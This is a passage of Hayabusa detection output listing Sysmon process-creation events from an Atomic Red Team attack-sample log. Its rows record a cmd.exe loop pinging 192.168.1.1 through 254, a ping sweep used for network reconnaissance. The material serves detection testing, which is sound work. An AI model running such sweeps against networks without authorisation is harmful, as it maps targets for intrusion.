MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 747F3D96-D942-5D31-0000-001013323600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 747F3D96-D946-5D31-0000-0010904C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 747F3D96-D948-5D31-0000-00102C5E3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D94A-5D31-0000-0010E8693600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 747F3D96-D94E-5D31-0000-0010C58B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D951-5D31-0000-00102BA63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.185 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 